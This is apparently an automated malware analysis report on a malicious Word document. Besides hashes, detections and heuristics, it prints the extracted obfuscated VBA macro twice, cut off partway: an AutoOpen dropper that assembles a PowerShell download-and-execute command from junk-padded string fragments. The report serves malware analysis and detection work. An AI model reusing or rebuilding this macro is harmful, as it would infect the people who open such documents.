Office (OLE) malware analysis — malicious · 8b0eaaf588ba69e6

MALICIOUS

Office (OLE)

113.2 KB Created: 2018-06-21 07:10:00 Authoring application: Microsoft Office Word First seen: 2019-01-12

MD5: 0cc528875ca4e2605ec13e0fbf70d373 SHA-1: e920cc14ccaf48848070aa4e73df1daff89e8e73 SHA-256: 8b0eaaf588ba69e6515b704f0eaf1cc9fb83540fa4eef1309232e5c895e77a9f

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() function. This macro constructs and executes a PowerShell command, indicated by the string 'OwerSHell & ( $PShoME[21]+$PSHoME[30]+'x')'. The constructed command appears to be designed to download and execute a second-stage payload. The presence of the ClamAV detection 'Doc.Dropper.Agent-6602248-0' further supports its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6602248-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6602248-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15257 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15257 bytes
SHA-256: `91411ee9c70bc54bf87d5282a0680f4d8388fb2e357f04cea2ec686ac746ea0f`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Qljcplqh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "AZQOujkCEf" Function wqiWdupm() On Error Resume Next For Each izNnzJ In KRjkSO nYiwU = 45147 + Atn(77086) / 81594 / Round(9342) / 96449 / CInt(lkDduf) zBwNw = pCncla = pCwGMk UEdvi = (lwnaO * 32251 + 21028 * CInt(mdtfU - CDbl(46340)) * 77006 * Oct(67953)) Next imiwWfRfUS = "OwerSHell &" + "( $PShoME[" + "21]+$PSHoM" + "E[30]+'x'" For Each pDzXbn In wEoqi wwZmB = 48568 + Atn(13951) / 48399 / Round(54602) / 66672 / CInt(tpXLz) QzvYY = zzVki = LpCbfu LDYNb = (AsYGz * 95510 + 78769 * CInt(ApfLIQ - CDbl(38331)) * 43434 * Oct(63090)) Next MnvUauiH = ")(-JOiN( " + "'63J78<120" + "<66Q84w10" + "9n97!59n38x5" + "9<117J126<1" + "08t54s116" + "s121t113n1" + "26Q120!" + "111n59n105Q12" + "2!117s127w116" For Each XbUFHz In EHSdpJ iXOSId = 93617 + Atn(68980) / 53318 / Round(64878) / 99633 / CInt(uQsizt) wwhtGd = TCjUjm = GRibDL lZFkOq = (tzQuX * 32657 + 7296 * CInt(pKAsZE - CDbl(7270)) * 49549 * Oct(21230)) Next cwVBiD = "a118x32!63" + "a92!120!108J7" + "9t113" + "x59!38Q59Q117s1" + "26n108w54J116Q" + "121J113Q126w1" For Each KEOXWF In ClHab nYBQf = 42093 + Atn(44800) / 39477 / Round(91823) / 86769 / CInt(zawZb) rMkaK = BFdvoz = KYumX zFQaT = (wAnjaw * 39412 + 78202 * CInt(hOniiQ - CDbl(2871)) * 60337 * Oct(38586)) Next wjoIb = "20n" + "111J59t72Q98" + "Q104<111Q126" + "n118w53x85n12" + "6!111s53J76s" + "126s12" + "1n8" For Each NZcHZ In qtDhwc ozTjS = 91573 + Atn(78896) / 56407 / Round(7194) / 87574 / CInt(HQjwSz) NOfKXc = arpFbT = PwlSJ odiKj = (qvEEnH * 10786 + 24464 * CInt(zODsj - CDbl(18674)) * 62930 * Oct(25744)) Next sFiqttQ = "8s119" + "Q114<126J1" + "17s111a32" + "w63x65!10" + "4x119s11" + "6t75" + "n76x59a38s59w60" + "n115x111<111n" + "10" For Each YcPMPQ In wiwov RXKlui = 81397 + Atn(92138) / 84922 / Round(94432) / 83376 / CInt(ddraXK) kDYVRq = HvFjXd = XwmwpE rXsFNu = (scnLXw * 85447 + 95452 * CInt(jTzzF - CDbl(88827)) * 62185 * Oct(9540)) Next FFEhPpU = "7<" + "33s52" + "w52<10" + "9x126s97w11" For Each WPCmNn In laBTw DziVD = 10670 + Atn(62148) / 88041 / Round(58223) / 7768 / CInt(zSLEu) lwzot = uYwAn = KLLmnj AmSfOk = (MwMDI * 85261 + 69730 * CInt(EjXPl - CDbl(86980)) * 66150 * Oct(50916)) Next QzRpkj = "5Q98J105!118w12" + "7n53t120<116t11" + "8w52Q90s" + "67s84s41n3" + "4n93n47<113n52<" + "91" For Each mhTiR In JrzIuU swGMCJ = 44563 + Atn(78663) / 54010 / Round(56680) / 75957 / CInt(ScrtW) QolUV = GwmYSb = oGoon czJLX = (GaujM * 42936 + 30384 * CInt(mCVfG - CDbl(32877)) * 87575 * Oct(343)) Next nslrOPNSTjC = "x115" + "!111J11" + "1!107a33x52w52" + "a112n1" + "26s119w119" + "<98" + "t127J122n" + "105!112J1" wqiWdupm = imiwWfRfUS + MnvUauiH + cwVBiD + wjoIb + sFiqttQ + FFEhPpU + QzRpkj + nslrOPNSTjC End Function Function uolWJ() On Error Resume Next For Each ulwnma In ztXOOq nHJTbc = 93440 + Atn(87847) / 99218 / Round(38369) / 58231 / CInt(WaGCvd) MfPFQ = aNmVa = UkjvD dBHHJ = (iLzoiT * 97602 + 40679 * CInt(zXujC - CDbl(89681)) * 4990 * Oct(90700)) Next nHNtzvooGNP = "26Q53<12" + "0a" + "116Q118t52n11" + "6Q84<45a41J4" + "4x121J52x91Q" + "115n" For Each duzOQ In cukimL zIjid = 89126 + Atn(50350) / 24729 / Round(95440) / 11479 / CInt(ZWZuB) tmzhMO = IppLL = HCZZV zLPnvs = (mIWAG * 68370 + 96900 * CInt(AJRpFi - CDbl(48907)) * 78367 * Oct(80087)) Next ZTOpR = "111<111!" + "107!3" + "3<52" + "!52" + "x111x105x114<10" + "5a11" + "6s11" + "0s117w127Q53s" For Each FFvIn In uJnoqK RJFYvL = 86974 + Atn(97197) / 5488 / Round(34506) / 8711 / CInt(KniBiZ) JLmZq = jCKaw = FhJpB fIDRsk = (EVnmC * 28872 + 4826 * CInt(PolYFw - CDbl(40058)) * 39986 * Oct(49023)) Next kYFVI = "12" + "0x116Q118" + "w52J95s120s6" + "6x" For Each fihCz In ckujE zmflBj = 24518 + Atn(49250) / 5858 / Round(61027) / 12598 / CInt(BZjTID) jGGUS = zPwDou = kOswJ QvlDP = (kPafr * 5271 + 33566 ... (truncated)

SHA-256: 91411ee9c70bc54bf87d5282a0680f4d8388fb2e357f04cea2ec686ac746ea0f

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Qljcplqh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "AZQOujkCEf"
Function wqiWdupm()
On Error Resume Next
For Each izNnzJ In KRjkSO
nYiwU = 45147 + Atn(77086) / 81594 / Round(9342) / 96449 / CInt(lkDduf)
zBwNw = pCncla = pCwGMk
UEdvi = (lwnaO * 32251 + 21028 * CInt(mdtfU - CDbl(46340)) * 77006 * Oct(67953))
Next
imiwWfRfUS = "OwerSHell  &" + "( $PShoME[" + "21]+$PSHoM" + "E[30]+'x'"
For Each pDzXbn In wEoqi
wwZmB = 48568 + Atn(13951) / 48399 / Round(54602) / 66672 / CInt(tpXLz)
QzvYY = zzVki = LpCbfu
LDYNb = (AsYGz * 95510 + 78769 * CInt(ApfLIQ - CDbl(38331)) * 43434 * Oct(63090))
Next
MnvUauiH = ")(-JOiN( " + "'63J78<120" + "<66Q84w10" + "9n97!59n38x5" + "9<117J126<1" + "08t54s116" + "s121t113n1" + "26Q120!" + "111n59n105Q12" + "2!117s127w116"
For Each XbUFHz In EHSdpJ
iXOSId = 93617 + Atn(68980) / 53318 / Round(64878) / 99633 / CInt(uQsizt)
wwhtGd = TCjUjm = GRibDL
lZFkOq = (tzQuX * 32657 + 7296 * CInt(pKAsZE - CDbl(7270)) * 49549 * Oct(21230))
Next
cwVBiD = "a118x32!63" + "a92!120!108J7" + "9t113" + "x59!38Q59Q117s1" + "26n108w54J116Q" + "121J113Q126w1"
For Each KEOXWF In ClHab
nYBQf = 42093 + Atn(44800) / 39477 / Round(91823) / 86769 / CInt(zawZb)
rMkaK = BFdvoz = KYumX
zFQaT = (wAnjaw * 39412 + 78202 * CInt(hOniiQ - CDbl(2871)) * 60337 * Oct(38586))
Next
wjoIb = "20n" + "111J59t72Q98" + "Q104<111Q126" + "n118w53x85n12" + "6!111s53J76s" + "126s12" + "1n8"
For Each NZcHZ In qtDhwc
ozTjS = 91573 + Atn(78896) / 56407 / Round(7194) / 87574 / CInt(HQjwSz)
NOfKXc = arpFbT = PwlSJ
odiKj = (qvEEnH * 10786 + 24464 * CInt(zODsj - CDbl(18674)) * 62930 * Oct(25744))
Next
sFiqttQ = "8s119" + "Q114<126J1" + "17s111a32" + "w63x65!10" + "4x119s11" + "6t75" + "n76x59a38s59w60" + "n115x111<111n" + "10"
For Each YcPMPQ In wiwov
RXKlui = 81397 + Atn(92138) / 84922 / Round(94432) / 83376 / CInt(ddraXK)
kDYVRq = HvFjXd = XwmwpE
rXsFNu = (scnLXw * 85447 + 95452 * CInt(jTzzF - CDbl(88827)) * 62185 * Oct(9540))
Next
FFEhPpU = "7<" + "33s52" + "w52<10" + "9x126s97w11"
For Each WPCmNn In laBTw
DziVD = 10670 + Atn(62148) / 88041 / Round(58223) / 7768 / CInt(zSLEu)
lwzot = uYwAn = KLLmnj
AmSfOk = (MwMDI * 85261 + 69730 * CInt(EjXPl - CDbl(86980)) * 66150 * Oct(50916))
Next
QzRpkj = "5Q98J105!118w12" + "7n53t120<116t11" + "8w52Q90s" + "67s84s41n3" + "4n93n47<113n52<" + "91"
For Each mhTiR In JrzIuU
swGMCJ = 44563 + Atn(78663) / 54010 / Round(56680) / 75957 / CInt(ScrtW)
QolUV = GwmYSb = oGoon
czJLX = (GaujM * 42936 + 30384 * CInt(mCVfG - CDbl(32877)) * 87575 * Oct(343))
Next
nslrOPNSTjC = "x115" + "!111J11" + "1!107a33x52w52" + "a112n1" + "26s119w119" + "<98" + "t127J122n" + "105!112J1"
wqiWdupm = imiwWfRfUS + MnvUauiH + cwVBiD + wjoIb + sFiqttQ + FFEhPpU + QzRpkj + nslrOPNSTjC
End Function
Function uolWJ()
On Error Resume Next
For Each ulwnma In ztXOOq
nHJTbc = 93440 + Atn(87847) / 99218 / Round(38369) / 58231 / CInt(WaGCvd)
MfPFQ = aNmVa = UkjvD
dBHHJ = (iLzoiT * 97602 + 40679 * CInt(zXujC - CDbl(89681)) * 4990 * Oct(90700))
Next
nHNtzvooGNP = "26Q53<12" + "0a" + "116Q118t52n11" + "6Q84<45a41J4" + "4x121J52x91Q" + "115n"
For Each duzOQ In cukimL
zIjid = 89126 + Atn(50350) / 24729 / Round(95440) / 11479 / CInt(ZWZuB)
tmzhMO = IppLL = HCZZV
zLPnvs = (mIWAG * 68370 + 96900 * CInt(AJRpFi - CDbl(48907)) * 78367 * Oct(80087))
Next
ZTOpR = "111<111!" + "107!3" + "3<52" + "!52" + "x111x105x114<10" + "5a11" + "6s11" + "0s117w127Q53s"
For Each FFvIn In uJnoqK
RJFYvL = 86974 + Atn(97197) / 5488 / Round(34506) / 8711 / CInt(KniBiZ)
JLmZq = jCKaw = FhJpB
fIDRsk = (EVnmC * 28872 + 4826 * CInt(PolYFw - CDbl(40058)) * 39986 * Oct(49023))
Next
kYFVI = "12" + "0x116Q118" + "w52J95s120s6" + "6x"
For Each fihCz In ckujE
zmflBj = 24518 + Atn(49250) / 5858 / Round(61027) / 12598 / CInt(BZjTID)
jGGUS = zPwDou = kOswJ
QvlDP = (kPafr * 5271 + 33566 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.